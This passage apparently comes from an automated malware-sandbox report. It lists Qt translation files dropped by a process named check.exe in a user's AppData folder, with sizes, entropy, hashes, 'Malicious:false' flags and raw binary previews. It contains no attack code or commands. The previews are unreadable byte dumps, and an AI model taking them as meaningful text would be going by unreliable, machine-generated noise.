                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB...(.(.....?.0T......5w......Uj......`.......a[...............t............K.39....u....."..........B<s...8..M^...j......y...J..!..O5^...Y..)^......o>...o...J..":...... <...t...E.8dz..!3.D ....".k.N.....k.N...d...n.......I..............2>...>......o.........G.......w............E.......e..,................^...S........$a......6.>...'...... y..K........... ..W.b....._Xn......GN...p..~.......TH...4.!.....9.K.H.............pN..........#].P.~...~.o.....N..(....b.........~......s.>.....o.....o.z.q..........................U.h.............D..e.....i..#.......(...@.8.G.8.=.>.N. .F.L.>.3.>. .<.>.6.5. .1.C.B.8. .B.5.,. .I.>. .4.>.:.C.<.5.=.B.0.F.V.O. .4.>.A.V. .V.=.4.5.:.A.C.T.B.L.A.O...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........@.8.<.V.B.:.0.:..........Note:.....QCLuceneResultWidget.....". .5.7.C.;.L.B.0.B.8. .?.>.H.C.:.C..........Search Results.....QCLuceneResultWidget....... .5.7
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6441
                                                                                                                                                                                                            Entropy (8bit):5.790303416386852
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:pB37nBD4H5PCyLDxLSzJPduYx9vja/FIgH9yIFqfs:rTZ4HUAD1S1JFe/F59PFqfs
                                                                                                                                                                                                            MD5:9297A6905B8B1823BF7E318D9138A104
                                                                                                                                                                                                            SHA1:3DB992A1B3BBCAF314B7EA4A000D6334D7492A52
                                                                                                                                                                                                            SHA-256:C02AAA20923F18ADDAB520BE5CB84EFD4C723396BDC24B4C9A72D406F101C7B4
                                                                                                                                                                                                            SHA-512:01F12CEE0AE456D78942A6049E1C77F94B406C8FFB4A5944DE15E54D1C760CDBA13279530A8F29B1443D1BBC647D3AF5436AAD8C43EB3944316C48300B3827E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB......I....L.0T......Uj......`.......a[...............t....P..@....Z.......<.........39.......s....2.................B<s......MQ..........9...J......31.....0.......O5Q......)Q...^..o>...........(...........J...V...........t.....8dz.....D ....Z.k.A.....k.A.......n.......I...........t..w................!...........o.......D...Q...E........$a......6.>...h...............%._Xa......GA..........._..TH...r.........pA.............P.~.....o.....].~.q.............~......o.....h.z.q...........H..0q....................i........2..S.u...y.`.Q.v.S.V.S..f/V.N:..e.hckcW(..}"_.0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..............Note:.....QCLuceneResultWidget......d.}"~.g...........Search Results.....QCLuceneResultWidget.....,d.}"~.g.N_..^vN.[.et..V.N:..e.hckcW(..}"_............VThe search results may not be complete since the documentation is still being indexed!.....QCLuceneResultWidget..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9301
                                                                                                                                                                                                            Entropy (8bit):5.80411750798786
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:4bgIXwsL78BQp4dRDP0ludqODa/wkB/tTWn5dJ6mO8IZiT9Dzz/wI3HyRWqUqS:lI/oS4dR5c/tTWn5/EZA9D/w+H8WqUqS
                                                                                                                                                                                                            MD5:47C3328D3918CF627112BB6C50E30B86
                                                                                                                                                                                                            SHA1:05705603AB3F28402A6C103E1C41DDFF21D140C0
                                                                                                                                                                                                            SHA-256:3697F1660D7F2AC9B37AC33CD1C7ECAE08ADBD26710E7E0076497CCDDC8BC830
                                                                                                                                                                                                            SHA-512:8DE1C3C5A48965CF6D8AA545DA9F0A5C00AE124F3E4153597915E7C0F4CAE1E26723270F58A47AA9FFA4AAF30E6EBA522D4EBAD27DECF17EF108E353E611980E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB......I....[.%.......0T......0T......Uj......Uj....R.`.....>.a[....................g..t....7..@......................39.......s................... .........B<s.....B<s.....B\>......MQ..........[...J...]..31.....+.s...c.0.....U.O5Q......)Q...C..o>.......................J...............t...3...t.....8dz.....D ....R.D ......k.A.....k.A.....k.N...'...n.......I.......I...........[..2....x..G........N......w................!...........:...........Q...&...............$a......6.>...I.......L.......$..K......................_Xa...y..GA...O..GN...........$..........TH...I.K.H................ Y..pA...K..pN.............P.~.....o.....D.~.q......>.............~......~........%c.. ..o.....!.z.q...........#..0q....................i..!Y....(..g.S..f/V.p.N.W(^.z.e.N.v.}"_.uvN-0............M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......P..;............Note:.....QCLuceneResultWidget......d.\.}Pg...........Sea
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.6255640074603277
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/IrLlAlHekfK/gp1MUXaMlI+rwtbWlMiayIPldkOgn:CwDrC+TYIUrIRt6HoiHn
                                                                                                                                                                                                            MD5:5A46979B45C67DD6312F33CCEA2ED7BC
                                                                                                                                                                                                            SHA1:4C56836B1FB10D9903B299CBCB925947D515B4C8
                                                                                                                                                                                                            SHA-256:BB246AABD501E14CED8B1FFC1369E3D5D26567AAE62B3EAD4D94C22FB77C3471
                                                                                                                                                                                                            SHA-512:BDBA4E1731CF254E95B0F1337410937C765E96FBB1D42F1D053033E1511FEE6F50C02705F781F4DAA0347E2299DC78A5A9942AC4EA343ED1F8F401F9ACD961E4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu....v.....q.t.b.a.s.e._.h.u.....q.t.s.c.r.i.p.t._.h.u.....q.t.m.u.l.t.i.m.e.d.i.a._.h.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.h.u
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.5752972123113778
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EbFlAlHeke5zOp1MUWLt7KlI+rwtbWlMj5FKIPldkOA9kk:CwDM+35aIUW5SIRt6Q50oi9Gk
                                                                                                                                                                                                            MD5:2BB8C94D420D3BC344C79A01043BDC89
                                                                                                                                                                                                            SHA1:3FBA773D58E6D3699C20AB41AEE6801E71E2DDAE
                                                                                                                                                                                                            SHA-256:9117AAC2D07BC86DFA55A29B8825ED27C7093300FCC90E143E135E00E85F09D7
                                                                                                                                                                                                            SHA-512:C6B13655AFB206B0056F5656B4A9BF33CC267FCC928F6973258131CFA6443970510226FE45A041E5AA988809E17D0B11C7458F4A241C71521EDED186596C6055
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it....v.....q.t.b.a.s.e._.i.t.....q.t.s.c.r.i.p.t._.i.t.....q.t.m.u.l.t.i.m.e.d.i.a._.i.t... .q.t.x.m.l.p.a.t.t.e.r.n.s._.i.t.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.599979504080125
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/il/lAlHekd6hY1MUV6JAlI+rwtbWlMgel3UlIPldkOG:Cwz4+pjUGAIRt6qVUloiB
                                                                                                                                                                                                            MD5:8A1EE3433304838CCD0EBE0A825E84D8
                                                                                                                                                                                                            SHA1:2B3476588350C5384E0F9A51FF2E3659E89B4846
                                                                                                                                                                                                            SHA-256:23457CE8E44E233C6F85D56A4EE6A2CECD87C9C7BDDE6D8B8A925902EED1CD9C
                                                                                                                                                                                                            SHA-512:2D8ACD668DF537E98B27161F9FA49828EB2EB6E9CF41DB38E7F5D31F610D150CD1B580A8AE9B472A4DFDE4D4BF983C24A56293BB911CF5879368664E4D4CF3D2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ja....v.....q.t.b.a.s.e._.j.a.....q.t.s.c.r.i.p.t._.j.a.....q.t.m.u.l.t.i.m.e.d.i.a._.j.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.j.a
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):146
                                                                                                                                                                                                            Entropy (8bit):3.652277257665055
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/rrr/lAlHekcQ/01MUUQMlI+rwtbWlMhQGlIPldkORn:CwCC+1Q/UUpIRt6SBloimn
                                                                                                                                                                                                            MD5:7B2659AF52B824EAC6C169CDD9467EE9
                                                                                                                                                                                                            SHA1:5727109218B222E3B654A8CC9933E970EB7C2118
                                                                                                                                                                                                            SHA-256:4CC1AF37E771F0A43898849CFF2CD42A820451B8D2B2E88931031629D781DB05
                                                                                                                                                                                                            SHA-512:E9475AC80BDBBEFF54F2724A2B6BA76992F18FD1913FD8EE1540A99FD7A112B79FED5A130B6AC6D7460E4420C06354FC6E4CF7770A7C6CBD3EAC1BDAF0082DE5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ko....v.....q.t.b.a.s.e._.k.o.....q.t.s.c.r.i.p.t._.k.o.....q.t.m.u.l.t.i.m.e.d.i.a._.k.o... .q.t.x.m.l.p.a.t.t.e.r.n.s._.k.o
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):165383
                                                                                                                                                                                                            Entropy (8bit):4.805977227348512
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:i5v3+zmayloj6yJjhnBAbnrKnGrhA7WgdXclIsooY9i:SvOzAloj6yJ9BA7riGr+7WKXc+s5ui
                                                                                                                                                                                                            MD5:8992B652D1499F5D2F12674F3F875A35
                                                                                                                                                                                                            SHA1:E22766A49612F79156C550D83C6C230345DDA433
                                                                                                                                                                                                            SHA-256:47EB5F97467DF769261421D54A5BEA1131C9FB9B6388791D38BB6574335B64BF
                                                                                                                                                                                                            SHA-512:9B8B6DBFF432F2A46C14BC183A6BAF84ACBF02BF2C5BB8C306C6538FBD9BE1C0A9015BD46728F2F652F9163AFC56B1E16D16EB95D8F7728F3C562AE9F4F1AE1E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ltB..0X...*..)C...+...|......P....@..9....A..9....B..:....C..:....D..;....E..;....F..<6...G..<....H..=)...I..=....P..>q...Q..>....R..?....S..@f...T..@....U..A\...V..B....W..B....X..C....Y..Cy...]..k....t..........t>......th......t.......pd...;..J'...;.._h...;.......;...{...;..J....;...)...M..l....O...R...O...............}..l9...m..lo......^S..(5..P{..+;..4...+;......+;......+O..4...+O......1...^...E@..?p..F...C...H4......HY......H.......I...D...I@..s...IA..t...IC...2..J.......J....Y..J.......J.......K...9...LD...`..L.......PS......R.......T...q...Zr...`..[`......[`..&@..\....e..\....b.._......._....P..1........E..........5........L..1...O...1...PP......7......../...........$.......$.......,.......y.......y..........K^..............x......8................L...E.......E.......E..*....................%..:....%.........0U.....W......Zo.....^....5.......0..I....0...F...0...|...0.......0.......0..+\...5...}.......... D...g.. D......+....j..,.......,.......<U...+..<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):89
                                                                                                                                                                                                            Entropy (8bit):4.156834975253888
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/HzllldQlHekbxplUp1MUTJ+b:Cwv+DIUEb
                                                                                                                                                                                                            MD5:19F1B919BB531E9E12E7F707BEBD8497
                                                                                                                                                                                                            SHA1:46E82683CEA28D877C73A5CE02F965BB1130FC62
                                                                                                                                                                                                            SHA-256:03467738042A15676E504BA02CB326DCDB773B171FADA3CD62B7A0E0564314A0
                                                                                                                                                                                                            SHA-512:901D7B26CAC7A4D0FFDB39A1D25767B5BC71BED4AFBE788D70BF19D4C58A8295167111675AB45E743FDF4768AF874D69417414C01CF23D5C525A3F6C8BF7D21F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv....0.....q.t.b.a.s.e._.l.v.....q.t.s.c.r.i.p.t._.l.v........)....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):161
                                                                                                                                                                                                            Entropy (8bit):3.8693516202048612
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/5J/p/lAlHekHp/7KlI+rwtbWlM6Tl/z21MUPp/FOlIPldkOjehB:Cwr+26IRt6nFURkloiT
                                                                                                                                                                                                            MD5:D71EA9FEFD97464B178235150EC8759E
                                                                                                                                                                                                            SHA1:61026FE602FD1B8B442A0D341C6BD759EEC75488
                                                                                                                                                                                                            SHA-256:BD7DD0C2CAB119A973DC10C3BFF7499D9728B928B541F86056921B30C8DB78E6
                                                                                                                                                                                                            SHA-512:ECD76A7D8B8D733E635B2BFEA90A4CD387B83D9D8A4EB6D299F59FF22AAA8D617A4C886A825A1CDDD901925C7839E2C18BDD4E0CD84152641922B66B62663F77
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl....v.....q.t.b.a.s.e._.p.l.....q.t.m.u.l.t.i.m.e.d.i.a._.p.l.....q.t.s.c.r.i.p.t._.p.l... .q.t.x.m.l.p.a.t.t.e.r.n.s._.p.l............,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70334
                                                                                                                                                                                                            Entropy (8bit):4.732724622610353
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:OKGUuWW+WHjS0gMBd483+Y7bDPs4RHBloLUIltlzAJnx4nnliM1OPlOibLG:JGUuWPuSgm0Jn+n4Mhj
                                                                                                                                                                                                            MD5:6656500F7A28EF820AE9F97FD47FB5BB
                                                                                                                                                                                                            SHA1:CC112B9C9513BCF7497F3417168B4C8A9F7640A9
                                                                                                                                                                                                            SHA-256:2C1E7BBF5168A64B43752DD4C547601C0BDE6D610F8671FA3E3AF38597E84783
                                                                                                                                                                                                            SHA-512:5C3CBFCF86AF6B4D949C1D914CD379E512E73BA350AF661033A386EE7FB981FBFCB43D9A35FDE7656E17BB09F64F1469F84867A780573C3359D645269461D5A6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pt_PTB...(...*...9...+...e...]..6....;.......;..-....;..;`...;..};...;.......M..6....O... ...O...w...........}..7....m..7B..........+;......+;..8S..+;..>...+O......+O..8#..H4......H.......J......K.......LD...)..L....}..PS...l..Zr...B..[`...;..[`.....\...kU.._......._.......1...?...............8...............E............,..................p........0...............v...........%...O...%..G........4...0.......0..:....0..y....0..|....0.......0...X...5.......5...... D..=... D..Kn..+....L..,...>...,......<U..z...<U......<.......F...>...F.......H5...4..H5..=...H5..K...H5......f....p..f...1...f...;...f...I...f...|H..f.......f.......l....................b......<...............>.......L ...........`......`..._.......A......2....e...g...e..>D...e..LW................y...,.*.y.....*.y..o..*.y.....*.T..L..*.0..'..*.0....+F...y..+F......+f......+f...C..+.z..0..+.....d.+....p0.+.....R.+.z..0U.+.....u.+....8..+....Ct.+....L..+....y..+.....Z.+......+...pc.+.....+....0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):3.984562388316898
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/oZlAlHekF8Op1MUNKJKlI+rwtbWlM4KKIPldkOSxRMugB:CwY+GIUgcIRt61oihM3
                                                                                                                                                                                                            MD5:F7A8C75408B9A34A2B185E76F51B7B85
                                                                                                                                                                                                            SHA1:065E987139C5FB809A6F9CDF3845BCD79707FDBB
                                                                                                                                                                                                            SHA-256:6492B267608C6FB76907BD8FCFC8F1EF57E9F4EBBC2E81ACA81715A88388F94A
                                                                                                                                                                                                            SHA-512:E768C5B438EC899801B22B1325F2244ACCC5E7C2EC5D270F510BC3CBC2D9A0536949C026DB7FB5862835E506A9F2020DEB2CC4001E7011FF974324542734F855
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru....v.....q.t.b.a.s.e._.r.u.....q.t.s.c.r.i.p.t._.r.u.....q.t.m.u.l.t.i.m.e.d.i.a._.r.u... .q.t.x.m.l.p.a.t.t.e.r.n.s._.r.u........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7731953311404336
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/3xRlAlHekE8lgp1MUM8lMlI+rwtbWlM5UllyIPldkOfll6kchn:CwS0+t8CIUM86IRt6KUlsoi2CVh
                                                                                                                                                                                                            MD5:24C179481B5EF574F33E983A62A34D53
                                                                                                                                                                                                            SHA1:0A67F1ED8CA4A5182F504806F8D47D499789F2D2
                                                                                                                                                                                                            SHA-256:B6ADFFD889FF96BF195CB997327E7D7005A815CAD67823FA6915A19C2D9BB668
                                                                                                                                                                                                            SHA-512:4757F3693120DAB2FBB7BCF1734EA20B3E3D9056B4B4E934A3129D660CFDC6C58B230459DB55912AF24AD5692BD221830BE0FF91E41D3EECD9439E79AC23FFE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk....v.....q.t.b.a.s.e._.s.k.....q.t.s.c.r.i.p.t._.s.k.....q.t.m.u.l.t.i.m.e.d.i.a._.s.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.s.k...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):228428
                                                                                                                                                                                                            Entropy (8bit):4.726953418955661
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:9zQH0hOtgmiAZu0eeAEv+v49JnnSmICgr3n7jhCQUeinqyU5UggtRLGrQ2LZO+Y1:RpUsSpGr36wsR
                                                                                                                                                                                                            MD5:D35A0FE35476BE8BD149CEE46E42B5E9
                                                                                                                                                                                                            SHA1:9F3C85C115A283E5230D1EEAD84C8CB73A71FA03
                                                                                                                                                                                                            SHA-256:C44E0313A9414CC0E490B65B0C036FA11BCA959353B228886547BC2C8492034F
                                                                                                                                                                                                            SHA-512:BEEB1751882AF081E80BE93F7464D4C6322B724EFA2CBD3E1CBE709181D380C1C57E770FA962BB706D6FCF4A8CB393E3F6E187C1F604F8CEEFB201CA3200BD1C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB..<....*.......+.......@...C...A.......B...<...C.......D...2...E.......F...d...G.......H...W...I.......P.......Q.......R.......S...x...T.......U...n...V...%...W.......X.......Y.......]..g~...t...V.......f..................................;..G....;..[....;...q...;..ia...;... ...M..g....O.......O.......[..,e...........}..g....m..h........Q..(5......+;..2...+;...b..+;...i..+O..2...+O...4..1......E@......F.......H4......HY...%..H.......I.......I@......IA...9..IC......J...6...J.......J.......J...^...K...7...LD......L....n..PS...U..R.......T....=..Zr......[`...V..[`......\...!,..\...8U.._..."b.._.../h..1.......E...9......4...............5........e...................$...<...$..Z....[.......,.......y...L...y..].......H.......@.......J.......6........~..........E...O...E..+....E...~..............,1...%..8r...%...........^..............................5.......0..Gx...0.......0..P....0..h....0.......0.......5...^.......... D...... D......+....`..,.......,...-...<U
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):65851
                                                                                                                                                                                                            Entropy (8bit):4.7906769989650515
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:4u6DkpgyKmRmG15mGM6iFPi6Q/qTlOQZY2dKN8gKw:4u6DotUG1sGMZPi6Q/qTlO2Y2YKw
                                                                                                                                                                                                            MD5:0E85E0E0E7DDFE3D4BDE302F27047F9C
                                                                                                                                                                                                            SHA1:AE59348E0C2E4F86F99DA6CF5DAB3B7E92504B7C
                                                                                                                                                                                                            SHA-256:4B4B6FF7FD237C9DA0301B4946132E68653D15EB5FAF38E4C5FBFEBB12DD97F7
                                                                                                                                                                                                            SHA-512:8CAAB6C61E9FA26A3A289A9E4DC515D157B3092D6D4ED43861220261BD2B7CC79B35B52F9ADE4EF558B5385B37EAC14575420DD55C475F435BB95B6C1E2561B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...B.......*.......+...i...]..6....;.......;..-f...;..:;...;..t....;.......M..64...O.......O...........q...}..6\...m..6........(..+;......+;..7...+;..=...+O......+O..7c..H4......H.......J.......K....F..LD...+..L.......PS...N..Zr......[`...7..[`...N..\...h4.._....J.._....k..1...>...............7........}......D............,...........*......i....................................%.......%..Fc.......6...0.......0..9....0..q....0..t....0.......0.......5.......5...... D..<}.. D..I...+.......,...=X..,.......<U..r...<U...n..<.......F...=...F....F..H5......H5..<...H5..J4..H5......f.......f...1V..f...:f..f...H;..f...t&..f.......f.......l..................8......;z..............<.......Je.......6...`...&...`...!.......9......1....e.......e..=....e..J..............g...y.....*.y.../.*.y..h..*.y.....*.T..J..*.0..'[.*.0...K.+F...q..+F.....+f......+f...A..+.z../..+.......+....i`.+.....X.+.z../..+.....S.+....7..+....Bi.+....K..+....q..+.......+......+...i..+.....+....0..F0i.....G.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):110
                                                                                                                                                                                                            Entropy (8bit):3.630483009136986
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7zl9lAlHekDN/01MULV4LlI+rwtbWlM+N:Cw5+wUGRIRt6n
                                                                                                                                                                                                            MD5:16CDF5B9D48B0F795D532A0D07F5C3A0
                                                                                                                                                                                                            SHA1:6E403C9096B3051973E2B681DFEBBC8DD024830D
                                                                                                                                                                                                            SHA-256:F574A2CFD4715885C3DBDF5AE60995252673BD94FDAA9586F7E0586F6C1AC0EE
                                                                                                                                                                                                            SHA-512:36A0431368010157EA8A45DCB00458076CCFFC08B37E443DEBD1AAD4A30C6080803337725A7A3DCBF2B410DC7BE89CEAF6C07C46F876E4EF5B08159E3BF38E6D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr....R.....q.t.b.a.s.e._.t.r.....q.t.s.c.r.i.p.t._.t.r.....q.t.m.u.l.t.i.m.e.d.i.a._.t.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):164
                                                                                                                                                                                                            Entropy (8bit):4.021402900389864
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/ZlRlAlHekCczOp1MUKUt7KlI+rwtbWlM/cFKIPldkONRMugB:CwUl0+rjIUKUcIRt6M/oioM3
                                                                                                                                                                                                            MD5:9B101363343847FE42167183320C03F0
                                                                                                                                                                                                            SHA1:F0DF2CFF913E588B7CADFDABBF69F4F632B2F96A
                                                                                                                                                                                                            SHA-256:F1621E680E1642F9463E4B07E7E78B50F9A7BDB7C321D7302039CB3405CBDEA4
                                                                                                                                                                                                            SHA-512:DA14FDF8DB514902733CAAC492293873351C595EBBE0ACB0849BECE24AB822602EE64D01051F1426CD1FC13A95D8607302CF9B515D9806FDD3BD047087DE447C
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk....v.....q.t.b.a.s.e._.u.k.....q.t.s.c.r.i.p.t._.u.k.....q.t.m.u.l.t.i.m.e.d.i.a._.u.k... .q.t.x.m.l.p.a.t.t.e.r.n.s._.u.k........)......,..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117347
                                                                                                                                                                                                            Entropy (8bit):5.8593733369029195
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:51dXW89nqEFu54aekvRzHHSVuf8j2+/xc3lhnbsfdAoz/w:v9qEFeLekvRznSVHJG3lhn+djY
                                                                                                                                                                                                            MD5:0D02F0DE5A12BCB338B7042DFBDAACF3
                                                                                                                                                                                                            SHA1:B7C10D249D8986AD8C6939B370407D07227A39F5
                                                                                                                                                                                                            SHA-256:28CDE75D7B32C81FEF1D4630C37B79A61DEC24B357632FF00D6365A57D8BE43B
                                                                                                                                                                                                            SHA-512:21F02EBA36B4411921EA3C70310B8E454E8FC2B8F09957FD6A63B71689DC381F7A5E2C3BDF2810734D659AB43D8A7BD46EF6436ECC52F75C71B5F5C313365444
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zhB..+....*.......+.......@.......A...8...B.......C.......D.......E...V...F.......G...L...H.......I...9...P.......Q...e...R...^...S.......T...T...U.......V...|...W.......X...o...Y.......]..4 ...;...2...;..,....;..8....;.......;.......M..4H...O.......O...........#...}..4p...m..4........N..(5......+;...f..+;..6Y..+;..<...+O...8..+O..6'..1......E@......F....Y..H4..."..HY..J...H.......I.......J.......J.......K....5..LD..._..L......PS...V..Q....6..R...N...W..../..Zr.....[`.....[`......\...lU.._......._....L..1...<........j......6...............B........I...$..K....$.......,...g...y...3.......A......r...........................9..L7......;w...E..5b...E...G.......5...%.......%..D........`......*........................0.......0..8W...0..}y...0...6...0.......0.......5.......5...... D..:... D..J...+....R..,...;...,......<U..~...<U......<......F...;...F......H5...i..H5..:...H5..Jk..H5...w..VE...[..f....u..f...0X..f...9...f...E...f.......f.......f....j..g....A..l.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):141
                                                                                                                                                                                                            Entropy (8bit):3.7198292994386235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/0N6xg/Rl/gl+kNXDelHrwtbWlMwTolIPldkOfDn:CwOO2+g6Mt63oloiUn
                                                                                                                                                                                                            MD5:ED4135D705AEF3D97F8BF6B8FF11F09C
                                                                                                                                                                                                            SHA1:308E2B8F74B863A61AD0B68F4A18ED06965EBEAA
                                                                                                                                                                                                            SHA-256:751ECDA0C33E061D91241268357FBD2F6B7F70A1116E714F28D22EFD61EC7A1A
                                                                                                                                                                                                            SHA-512:B6E6D00553A9C427130129B9D30E862028E549F372A832F0F05747C8E2A79E443F4932EC3AE177537C8BA00D26B5B6CB97D5B35426AB5229F6A468CA485BE0B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
